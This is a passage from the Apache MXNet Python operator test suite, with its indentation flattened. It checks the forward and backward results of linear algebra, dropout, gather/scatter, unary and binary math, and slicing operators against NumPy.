data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
def test_laop_4():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_device() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test extraction of triangle by doing a full roundtrip as the intermediate extracted
# triangle has different orderings than numpy.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@pytest.mark.skip(reason="Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
@pytest.mark.flaky
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure input zeroes are none (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# Hopefully should be within ratio/2 %
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_device(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_device(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
check_dropout_ratio(0.5, shape, cudnn_off=False)
check_dropout_ratio(0.0, shape, cudnn_off=False)
check_dropout_ratio(1.0, shape, cudnn_off=False)
check_dropout_ratio(0.75, shape, cudnn_off=False)
check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
check_passthrough(0.5, shape, cudnn_off=False)
check_passthrough(0.0, shape, cudnn_off=False)
check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check if indices is out of bound
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@pytest.mark.serial
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
pytest.raises(MXNetError, min)
pytest.raises(MXNetError, max)
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
